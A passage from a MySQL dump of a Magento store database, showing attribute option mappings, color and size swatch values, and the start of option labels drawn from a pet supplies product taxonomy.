(4936, 130, 4932),
(4937, 130, 4933),
(4938, 130, 4934),
(4939, 130, 4935),
(4940, 130, 4936),
(4941, 130, 4937),
(4942, 130, 4938),
(4943, 130, 4939),
(4944, 130, 4940),
(4945, 130, 4941),
(4946, 130, 4942),
(4947, 130, 4943),
(4948, 130, 4944),
(4949, 130, 4945),
(4950, 130, 4946),
(4951, 130, 4947),
(4952, 130, 4948),
(4953, 130, 4949),
(4954, 130, 4950),
(4955, 130, 4951),
(4956, 130, 4952),
(4957, 130, 4953),
(4958, 130, 4954),
(4959, 130, 4955),
(4960, 130, 4956),
(4961, 130, 4957),
(4962, 130, 4958),
(4963, 130, 4959),
(4964, 130, 4960),
(4965, 130, 4961),
(4966, 130, 4962),
(4967, 130, 4963),
(4968, 130, 4964),
(4969, 130, 4965),
(4970, 130, 4966),
(4971, 130, 4967),
(4972, 130, 4968),
(4973, 130, 4969),
(4974, 130, 4970),
(4975, 130, 4971),
(4976, 130, 4972),
(4977, 130, 4973),
(4978, 130, 4974),
(4979, 130, 4975),
(4980, 130, 4976),
(4981, 130, 4977),
(4982, 130, 4978),
(4983, 130, 4979),
(4984, 130, 4980),
(4985, 130, 4981),
(4986, 130, 4982),
(4987, 130, 4983),
(4988, 130, 4984),
(4989, 130, 4985),
(4990, 130, 4986),
(4991, 130, 4987),
(4992, 130, 4988),
(4993, 130, 4989),
(4994, 130, 4990),
(4995, 130, 4991),
(4996, 130, 4992),
(4997, 130, 4993),
(4998, 130, 4994),
(4999, 130, 4995),
(5000, 130, 4996),
(5001, 130, 4997),
(5002, 130, 4998),
(5003, 130, 4999),
(5004, 130, 5000),
(5005, 130, 5001),
(5006, 130, 5002),
(5007, 130, 5003),
(5008, 130, 5004),
(5009, 130, 5005),
(5010, 130, 5006),
(5011, 130, 5007),
(5012, 130, 5008),
(5013, 130, 5009),
(5014, 130, 5010),
(5015, 130, 5011),
(5016, 130, 5012),
(5017, 130, 5013),
(5018, 130, 5014),
(5019, 130, 5015),
(5020, 130, 5016),
(5021, 130, 5017),
(5022, 130, 5018),
(5023, 130, 5019),
(5024, 130, 5020),
(5025, 130, 5021),
(5026, 130, 5022),
(5027, 130, 5023),
(5028, 130, 5024),
(5029, 130, 5025),
(5030, 130, 5026),
(5031, 130, 5027),
(5032, 130, 5028),
(5033, 130, 5029),
(5034, 130, 5030),
(5035, 130, 5031),
(5036, 130, 5032),
(5037, 130, 5033),
(5038, 130, 5034),
(5039, 130, 5035),
(5040, 130, 5036),
(5041, 130, 5037),
(5042, 130, 5038),
(5043, 130, 5039),
(5044, 130, 5040),
(5045, 130, 5041),
(5046, 130, 5042),
(5047, 130, 5043),
(5048, 130, 5044),
(5049, 130, 5045),
(5050, 130, 5046),
(5051, 130, 5047),
(5052, 130, 5048),
(5053, 130, 5049),
(5054, 130, 5050),
(5055, 130, 5051),
(5056, 130, 5052),
(5057, 130, 5053),
(5058, 130, 5054),
(5059, 130, 5055),
(5060, 130, 5056),
(5061, 130, 5057),
(5062, 130, 5058),
(5063, 130, 5059),
(5064, 130, 5060),
(5065, 130, 5061),
(5066, 130, 5062),
(5067, 130, 5063),
(5068, 130, 5064),
(5069, 130, 5065),
(5070, 130, 5066),
(5071, 130, 5067),
(5072, 130, 5068),
(5073, 130, 5069),
(5074, 130, 5070),
(5075, 130, 5071),
(5076, 130, 5072),
(5077, 130, 5073),
(5078, 130, 5074),
(5079, 130, 5075),
(5080, 130, 5076),
(5081, 130, 5077),
(5082, 130, 5078),
(5083, 130, 5079),
(5084, 130, 5080),
(5085, 130, 5081),
(5086, 130, 5082),
(5087, 130, 5083),
(5088, 130, 5084),
(5089, 130, 5085),
(5090, 130, 5086),
(5091, 130, 5087),
(5092, 130, 5088),
(5093, 130, 5089),
(5094, 130, 5090),
(5095, 130, 5091),
(5096, 130, 5092),
(5097, 130, 5093),
(5098, 130, 5094),
(5099, 130, 5095),
(5100, 130, 5096),
(5101, 130, 5097),
(5102, 130, 5098),
(5103, 130, 5099),
(5104, 130, 5100),
(5105, 130, 5101),
(5106, 130, 5102),
(5107, 130, 5103),
(5108, 130, 5104),
(5109, 130, 5105),
(5110, 130, 5106),
(5111, 130, 5107),
(5112, 130, 5108),
(5113, 130, 5109),
(5114, 130, 5110),
(5115, 130, 5111),
(5116, 130, 5112),
(5117, 130, 5113),
(5118, 130, 5114),
(5119, 130, 5115),
(5120, 130, 5116),
(5121, 130, 5117),
(5122, 130, 5118),
(5123, 130, 5119),
(5124, 130, 5120),
(5125, 130, 5121),
(5126, 130, 5122),
(5127, 130, 5123),
(5128, 130, 5124),
(5129, 130, 5125),
(5130, 130, 5126),
(5131, 130, 5127),
(5132, 130, 5128),
(5133, 130, 5129),
(5134, 130, 5130),
(5135, 130, 5131),
(5136, 130, 5132),
(5137, 130, 5133),
(5138, 130, 5134),
(5139, 130, 5135),
(5140, 130, 5136),
(5141, 130, 5137),
(5142, 130, 5138),
(5143, 130, 5139),
(5144, 130, 5140),
(5145, 130, 5141),
(5146, 130, 5142),
(5147, 130, 5143),
(5148, 130, 5144),
(5149, 130, 5145),
(5150, 130, 5146),
(5151, 130, 5147),
(5152, 130, 5148),
(5153, 130, 5149),
(5154, 130, 5150),
(5155, 130, 5151),
(5156, 130, 5152),
(5157, 130, 5153),
(5158, 130, 5154),
(5159, 130, 5155),
(5160, 130, 5156),
(5161, 130, 5157),
(5162, 130, 5158),
(5163, 130, 5159),
(5164, 130, 5160),
(5165, 130, 5161),
(5166, 130, 5162),
(5167, 130, 5163),
(5168, 130, 5164),
(5169, 130, 5165),
(5170, 130, 5166),
(5171, 130, 5167),
(5172, 130, 5168),
(5173, 130, 5169),
(5174, 130, 5170),
(5175, 130, 5171),
(5176, 130, 5172),
(5177, 130, 5173),
(5178, 130, 5174),
(5179, 130, 5175),
(5180, 130, 5176),
(5181, 130, 5177),
(5182, 130, 5178),
(5183, 130, 5179),
(5184, 130, 5180),
(5185, 130, 5181),
(5186, 130, 5182),
(5187, 130, 5183),
(5188, 130, 5184),
(5189, 130, 5185),
(5190, 130, 5186),
(5191, 130, 5187),
(5192, 130, 5188),
(5193, 130, 5189),
(5194, 130, 5190),
(5195, 130, 5191),
(5196, 130, 5192),
(5197, 130, 5193),
(5198, 130, 5194),
(5199, 130, 5195),
(5200, 130, 5196),
(5201, 130, 5197),
(5202, 130, 5198),
(5203, 130, 5199),
(5204, 130, 5200),
(5205, 130, 5201),
(5206, 130, 5202),
(5207, 130, 5203),
(5208, 130, 5204),
(5209, 130, 5205),
(5210, 130, 5206),
(5211, 130, 5207),
(5212, 130, 5208),
(5213, 130, 5209),
(5214, 130, 5210),
(5215, 130, 5211),
(5216, 130, 5212),
(5217, 130, 5213),
(5218, 130, 5214),
(5219, 130, 5215),
(5220, 130, 5216),
(5221, 130, 5217),
(5222, 130, 5218),
(5223, 130, 5219),
(5224, 130, 5220),
(5225, 130, 5221),
(5226, 130, 5222),
(5227, 130, 5223),
(5228, 130, 5224),
(5229, 130, 5225),
(5230, 130, 5226),
(5231, 130, 5227),
(5232, 130, 5228),
(5233, 130, 5229),
(5234, 130, 5230),
(5235, 130, 5231),
(5236, 130, 5232),
(5237, 130, 5233),
(5238, 130, 5234),
(5239, 130, 5235),
(5240, 130, 5236),
(5241, 130, 5237),
(5242, 130, 5238),
(5243, 130, 5239),
(5244, 130, 5240),
(5245, 130, 5241),
(5246, 130, 5242),
(5247, 130, 5243),
(5248, 130, 5244),
(5249, 130, 5245),
(5250, 130, 5246),
(5251, 130, 5247),
(5252, 130, 5248),
(5253, 130, 5249),
(5254, 130, 5250),
(5255, 130, 5251),
(5256, 130, 5252),
(5257, 130, 5253),
(5258, 130, 5254),
(5259, 130, 5255),
(5260, 130, 5256),
(5261, 130, 5257),
(5262, 130, 5258),
(5263, 130, 5259),
(5264, 130, 5260),
(5265, 130, 5261),
(5266, 130, 5262),
(5267, 130, 5263),
(5268, 130, 5264),
(5269, 130, 5265),
(5270, 130, 5266),
(5271, 130, 5267),
(5272, 130, 5268),
(5273, 130, 5269),
(5274, 130, 5270),
(5275, 130, 5271),
(5276, 130, 5272),
(5277, 130, 5273),
(5278, 130, 5274),
(5279, 130, 5275),
(5280, 130, 5276),
(5281, 130, 5277),
(5282, 130, 5278),
(5283, 130, 5279),
(5284, 130, 5280),
(5285, 130, 5281),
(5286, 130, 5282),
(5287, 130, 5283),
(5288, 130, 5284),
(5289, 130, 5285),
(5290, 130, 5286),
(5291, 130, 5287),
(5292, 130, 5288),
(5293, 130, 5289),
(5294, 130, 5290),
(5295, 130, 5291),
(5296, 130, 5292),
(5297, 130, 5293),
(5298, 130, 5294),
(5299, 130, 5295),
(5300, 130, 5296),
(5301, 130, 5297),
(5302, 130, 5298),
(5303, 130, 5299),
(5304, 130, 5300),
(5305, 130, 5301),
(5306, 130, 5302),
(5307, 130, 5303),
(5308, 130, 5304),
(5309, 130, 5305),
(5310, 130, 5306),
(5311, 130, 5307),
(5312, 130, 5308),
(5313, 130, 5309),
(5314, 130, 5310),
(5315, 130, 5311),
(5316, 130, 5312),
(5317, 130, 5313),
(5318, 130, 5314),
(5319, 130, 5315),
(5320, 130, 5316),
(5321, 130, 5317),
(5322, 130, 5318),
(5323, 130, 5319),
(5324, 130, 5320),
(5325, 130, 5321),
(5326, 130, 5322),
(5327, 130, 5323),
(5328, 130, 5324),
(5329, 130, 5325),
(5330, 130, 5326),
(5331, 130, 5327),
(5332, 130, 5328),
(5333, 130, 5329),
(5334, 130, 5330),
(5335, 130, 5331),
(5336, 130, 5332),
(5337, 130, 5333),
(5338, 130, 5334),
(5339, 130, 5335),
(5340, 130, 5336),
(5341, 130, 5337),
(5342, 130, 5338),
(5343, 130, 5339),
(5344, 130, 5340),
(5345, 130, 5341),
(5346, 130, 5342),
(5347, 130, 5343),
(5348, 130, 5344),
(5349, 130, 5345),
(5350, 130, 5346),
(5351, 130, 5347),
(5352, 130, 5348),
(5353, 130, 5349),
(5354, 130, 5350),
(5355, 130, 5351),
(5356, 130, 5352),
(5357, 130, 5353),
(5358, 130, 5354),
(5359, 130, 5355),
(5360, 130, 5356),
(5361, 130, 5357),
(5362, 130, 5358),
(5363, 130, 5359),
(5364, 130, 5360),
(5365, 130, 5361),
(5366, 130, 5362),
(5367, 130, 5363),
(5368, 130, 5364),
(5369, 130, 5365),
(5370, 130, 5366),
(5371, 130, 5367),
(5372, 130, 5368),
(5373, 130, 5369),
(5374, 130, 5370),
(5375, 130, 5371),
(5376, 130, 5372),
(5377, 130, 5373),
(5378, 130, 5374),
(5379, 130, 5375),
(5380, 130, 5376),
(5381, 130, 5377),
(5382, 130, 5378),
(5383, 130, 5379),
(5384, 130, 5380),
(5385, 130, 5381),
(5386, 130, 5382),
(5387, 130, 5383),
(5388, 130, 5384),
(5389, 130, 5385),
(5390, 130, 5386),
(5391, 130, 5387),
(5392, 130, 5388),
(5393, 130, 5389),
(5394, 130, 5390),
(5395, 130, 5391),
(5396, 130, 5392),
(5397, 130, 5393),
(5398, 130, 5394),
(5399, 130, 5395),
(5400, 130, 5396),
(5401, 130, 5397),
(5402, 130, 5398),
(5403, 130, 5399),
(5404, 130, 5400),
(5405, 130, 5401),
(5406, 130, 5402),
(5407, 130, 5403),
(5408, 130, 5404),
(5409, 130, 5405),
(5410, 130, 5406),
(5411, 130, 5407),
(5412, 130, 5408),
(5413, 130, 5409),
(5414, 130, 5410),
(5415, 130, 5411),
(5416, 130, 5412),
(5417, 130, 5413),
(5418, 130, 5414),
(5419, 130, 5415),
(5420, 130, 5416),
(5421, 130, 5417),
(5422, 130, 5418),
(5423, 130, 5419),
(5424, 130, 5420),
(5425, 130, 5421),
(5426, 130, 5422),
(5427, 130, 5423),
(5428, 130, 5424),
(5429, 130, 5425),
(5430, 130, 5426),
(5431, 138, 0),
(5432, 138, 1),
(5433, 138, 2),
(5434, 138, 3),
(5435, 138, 4),
(5436, 138, 5),
(5437, 138, 6),
(5438, 138, 7),
(5439, 138, 8),
(5440, 138, 9),
(5441, 138, 10),
(5442, 138, 11),
(5443, 138, 12),
(5444, 138, 13),
(5445, 138, 14),
(5446, 138, 15),
(5447, 138, 16),
(5448, 138, 17),
(5449, 138, 18),
(5450, 138, 19),
(5451, 139, 0),
(5452, 139, 1),
(5453, 139, 2),
(5454, 139, 3),
(5455, 139, 4),
(5456, 139, 5),
(5457, 139, 6),
(5458, 140, 0),
(5459, 140, 1),
(5460, 140, 2),
(5461, 140, 3),
(5462, 140, 4),
(5463, 140, 5),
(5464, 140, 6),
(5465, 140, 7),
(5466, 140, 8),
(5467, 140, 9),
(5468, 140, 10),
(5469, 140, 11),
(5470, 140, 12),
(5471, 140, 13),
(5472, 140, 14),
(5473, 140, 15),
(5474, 140, 16),
(5475, 140, 17),
(5476, 93, 0),
(5477, 93, 1),
(5478, 93, 2),
(5479, 93, 3),
(5480, 93, 4),
(5481, 93, 5),
(5482, 93, 6),
(5483, 93, 7),
(5484, 93, 8),
(5485, 93, 9),
(5486, 93, 10),
(5487, 93, 11),
(5488, 141, 0),
(5489, 141, 1),
(5490, 141, 2),
(5491, 141, 3),
(5492, 141, 4),
(5493, 141, 5),
(5494, 141, 6),
(5495, 141, 7),
(5496, 142, 0),
(5497, 142, 1),
(5498, 142, 2),
(5499, 142, 3),
(5500, 142, 4),
(5501, 142, 5),
(5502, 142, 6),
(5503, 142, 7),
(5504, 142, 8),
(5505, 142, 9),
(5506, 142, 10),
(5507, 143, 0),
(5508, 143, 1),
(5509, 143, 2),
(5510, 143, 3),
(5511, 143, 4),
(5512, 144, 0),
(5513, 144, 1),
(5514, 144, 2),
(5515, 144, 3),
(5516, 144, 4),
(5517, 144, 5),
(5518, 145, 0),
(5519, 145, 2),
(5520, 145, 4),
(5521, 145, 6),
(5522, 145, 8),
(5523, 145, 10),
(5524, 146, 0),
(5525, 147, 0),
(5526, 148, 0),
(5527, 149, 0),
(5528, 150, 0),
(5529, 151, 0),
(5530, 151, 1),
(5531, 152, 0),
(5532, 152, 1),
(5533, 152, 2),
(5534, 152, 3),
(5535, 152, 4),
(5536, 152, 5),
(5537, 152, 6),
(5538, 152, 7),
(5539, 152, 8),
(5540, 152, 9),
(5541, 152, 10),
(5542, 152, 11),
(5543, 153, 0),
(5544, 153, 1),
(5545, 153, 2),
(5546, 153, 3),
(5547, 153, 4),
(5548, 153, 5),
(5549, 153, 6),
(5550, 153, 7),
(5551, 153, 8),
(5552, 153, 9),
(5553, 153, 10),
(5554, 153, 11),
(5555, 153, 12),
(5556, 153, 13),
(5557, 153, 14),
(5558, 153, 15),
(5559, 153, 16),
(5560, 153, 17),
(5561, 153, 18),
(5562, 153, 19),
(5563, 153, 20),
(5564, 153, 21),
(5565, 153, 22),
(5566, 153, 23),
(5567, 153, 24),
(5568, 153, 25),
(5569, 140, 0),
(5570, 140, 1),
(5571, 140, 2),
(5572, 140, 3),
(5573, 140, 4),
(5574, 140, 5),
(5575, 140, 6),
(5576, 140, 7),
(5577, 140, 8),
(5578, 140, 9),
(5579, 140, 10),
(5580, 140, 11),
(5581, 140, 12),
(5582, 140, 13),
(5583, 140, 14),
(5584, 140, 15),
(5585, 140, 16),
(5586, 140, 17),
(5587, 154, 0),
(5588, 154, 1),
(5589, 154, 2),
(5590, 154, 3),
(5591, 154, 4),
(5592, 154, 5),
(5593, 145, 1),
(5594, 145, 3),
(5595, 145, 5),
(5596, 145, 7),
(5597, 145, 9),
(5598, 145, 11),
(5599, 145, 12),
(5600, 145, 13),
(5601, 145, 14),
(5602, 145, 15),
(5603, 145, 16),
(5604, 145, 17),
(5605, 145, 18),
(5606, 145, 19),
(5607, 155, 0),
(5608, 155, 1),
(5609, 155, 2),
(5610, 155, 3),
(5611, 155, 4),
(5612, 155, 5),
(5613, 155, 6),
(5614, 155, 7),
(5615, 155, 8),
(5616, 155, 9),
(5617, 155, 10),
(5618, 155, 11),
(5619, 156, 0),
(5620, 156, 1),
(5621, 156, 2),
(5622, 156, 3),
(5623, 156, 4),
(5624, 156, 5),
(5625, 156, 6),
(5626, 156, 7),
(5627, 156, 8),
(5628, 157, 0),
(5629, 157, 1),
(5630, 157, 2),
(5631, 157, 3),
(5632, 157, 4),
(5633, 157, 5),
(5634, 157, 6),
(5635, 157, 7),
(5636, 157, 8),
(5637, 157, 9),
(5638, 157, 10);

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute_option_swatch`
--

CREATE TABLE `eav_attribute_option_swatch` (
  `swatch_id` int(10) UNSIGNED NOT NULL COMMENT 'Swatch ID',
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `type` smallint(5) UNSIGNED NOT NULL COMMENT 'Swatch type: 0 - text, 1 - visual color, 2 - visual image',
  `value` varchar(255) DEFAULT NULL COMMENT 'Swatch Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Magento Swatches table';

--
-- Dumping data for table `eav_attribute_option_swatch`
--

INSERT INTO `eav_attribute_option_swatch` (`swatch_id`, `option_id`, `store_id`, `type`, `value`) VALUES
(1, 5476, 0, 1, '#000000'),
(2, 5477, 0, 1, '#1857f7'),
(3, 5478, 0, 1, '#945454'),
(4, 5479, 0, 1, '#8f8f8f'),
(5, 5480, 0, 1, '#53a828'),
(6, 5481, 0, 1, '#ce64d4'),
(7, 5482, 0, 1, '#ffffff'),
(8, 5483, 0, 1, '#eb6703'),
(9, 5484, 0, 1, '#ef3dff'),
(10, 5485, 0, 1, '#ff0000'),
(11, 5486, 0, 1, '#ffffff'),
(12, 5487, 0, 1, '#ffd500'),
(13, 5518, 0, 0, '55 cm'),
(14, 5518, 1, 0, '55 cm'),
(15, 5593, 0, 0, 'XS'),
(16, 5593, 1, 0, 'XS'),
(17, 5519, 0, 0, '65 cm'),
(18, 5519, 1, 0, '65 cm'),
(19, 5594, 0, 0, 'S'),
(20, 5594, 1, 0, 'S'),
(21, 5520, 0, 0, '75 cm'),
(22, 5520, 1, 0, '75 cm'),
(23, 5595, 0, 0, 'M'),
(24, 5595, 1, 0, 'M'),
(25, 5521, 0, 0, '6 foot'),
(26, 5521, 1, 0, '6 foot'),
(27, 5596, 0, 0, 'L'),
(28, 5596, 1, 0, 'L'),
(29, 5522, 0, 0, '8 foot'),
(30, 5522, 1, 0, '8 foot'),
(31, 5597, 0, 0, 'XL'),
(32, 5597, 1, 0, 'XL'),
(33, 5523, 0, 0, '10 foot'),
(34, 5523, 1, 0, '10 foot'),
(35, 5598, 0, 0, '28'),
(36, 5598, 1, 0, '28'),
(37, 5599, 0, 0, '29'),
(38, 5599, 1, 0, '29'),
(39, 5600, 0, 0, '30'),
(40, 5600, 1, 0, '30'),
(41, 5601, 0, 0, '31'),
(42, 5601, 1, 0, '31'),
(43, 5602, 0, 0, '32'),
(44, 5602, 1, 0, '32'),
(45, 5603, 0, 0, '33'),
(46, 5603, 1, 0, '33'),
(47, 5604, 0, 0, '34'),
(48, 5604, 1, 0, '34'),
(49, 5605, 0, 0, '36'),
(50, 5605, 1, 0, '36'),
(51, 5606, 0, 0, '38'),
(52, 5606, 1, 0, '38');

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute_option_value`
--

CREATE TABLE `eav_attribute_option_value` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Attribute Option Value';

--
-- Dumping data for table `eav_attribute_option_value`
--

INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(1, 1, 0, 'Male'),
(2, 2, 0, 'Female'),
(3, 3, 0, 'Not Specified'),
(4, 4, 0, 'Animals & Pet Supplies'),
(5, 5, 0, 'Animals & Pet Supplies > Live Animals'),
(6, 6, 0, 'Animals & Pet Supplies > Pet Supplies'),
(7, 7, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies'),
(8, 8, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Cage Accessories'),
(9, 9, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Cage Accessories > Bird Cage Bird Baths'),
(10, 10, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Cage Accessories > Bird Cage Food & Water Dishes'),
(11, 11, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Cages & Stands'),
(12, 12, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Food'),
(13, 13, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Gyms & Playstands'),
(14, 14, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Ladders & Perches'),
(15, 15, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Toys'),
(16, 16, 0, 'Animals & Pet Supplies > Pet Supplies > Bird Supplies > Bird Treats'),
(17, 17, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies'),
(18, 18, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Apparel'),
(19, 19, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Beds'),
(20, 20, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Food'),
(21, 21, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Furniture'),
(22, 22, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Furniture Accessories'),
(23, 23, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Litter'),
(24, 24, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Litter Box Liners'),
(25, 25, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Litter Box Mats'),
(26, 26, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Litter Boxes'),
(27, 27, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Toys'),
(28, 28, 0, 'Animals & Pet Supplies > Pet Supplies > Cat Supplies > Cat Treats'),
(29, 29, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies'),
(30, 30, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Apparel'),
(31, 31, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Beds'),
(32, 32, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Diaper Pads & Liners'),
(33, 33, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Diapers'),
(34, 34, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Food'),
(35, 35, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Houses'),
(36, 36, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Kennel & Run Accessories'),
(37, 37, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Kennels & Runs'),
(38, 38, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Toys'),
(39, 39, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Treadmills'),
(40, 40, 0, 'Animals & Pet Supplies > Pet Supplies > Dog Supplies > Dog Treats'),
(41, 41, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies'),
(42, 42, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium & Pond Tubing'),
(43, 43, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Air Stones & Diffusers'),
(44, 44, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Cleaning Supplies'),
(45, 45, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Decor'),
(46, 46, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Filters'),
(47, 47, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Fish Nets'),
(48, 48, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Gravel & Substrates'),
(49, 49, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Lighting'),
(50, 50, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Overflow Boxes'),
(51, 51, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Stands'),
(52, 52, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Temperature Controllers'),
(53, 53, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquarium Water Treatments'),
(54, 54, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquariums'),
(55, 55, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Aquatic Plant Fertilizers'),
(56, 56, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Fish Feeders'),
(57, 57, 0, 'Animals & Pet Supplies > Pet Supplies > Fish Supplies > Fish Food'),
(58, 58, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Agility Equipment'),
(59, 59, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Apparel Hangers'),
(60, 60, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Bed Accessories'),
(61, 61, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Bells & Charms'),
(62, 62, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Biometric Monitors'),
(63, 63, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Biometric Monitors > Pet Glucose Meters'),
(64, 64, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Biometric Monitors > Pet Pedometers'),
(65, 65, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Biometric Monitors > Pet Thermometers'),
(66, 66, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Bowl Mats'),
(67, 67, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Bowl Stands'),
(68, 68, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Bowls, Feeders & Waterers'),
(69, 69, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Carrier & Crate Accessories'),
(70, 70, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Carriers & Crates'),
(71, 71, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Collars & Harnesses'),
(72, 72, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Containment Systems'),
(73, 73, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Door Accessories'),
(74, 74, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Doors'),
(75, 75, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Eye Drops & Lubricants'),
(76, 76, 0, 'Animals & Pet Supplies > Pet Supplies > Pet First Aid & Emergency Kits'),
(77, 77, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Flea & Tick Control'),
(78, 78, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Food Containers'),
(79, 79, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Food Scoops'),
(80, 80, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies'),
(81, 81, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Combs & Brushes'),
(82, 82, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Fragrances & Deodorizing Sprays'),
(83, 83, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Hair Clippers & Trimmers'),
(84, 84, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Hair Dryers'),
(85, 85, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Nail Polish'),
(86, 86, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Nail Tools'),
(87, 87, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Shampoo & Conditioner'),
(88, 88, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Grooming Supplies > Pet Wipes'),
(89, 89, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Heating Pad Accessories'),
(90, 90, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Heating Pads'),
(91, 91, 0, 'Animals & Pet Supplies > Pet Supplies > Pet ID Tags'),
(92, 92, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Leash Extensions'),
(93, 93, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Leashes'),
(94, 94, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Medical Collars'),
(95, 95, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Medical Tape & Bandages'),
(96, 96, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Medicine'),
(97, 97, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Muzzles'),
(98, 98, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Oral Care Supplies'),
(99, 99, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Playpens'),
(100, 100, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Steps & Ramps'),
(101, 101, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Strollers'),
(102, 102, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Sunscreen'),
(103, 103, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Training Aids'),
(104, 104, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Training Aids > Pet Training Clickers & Treat Dispensers'),
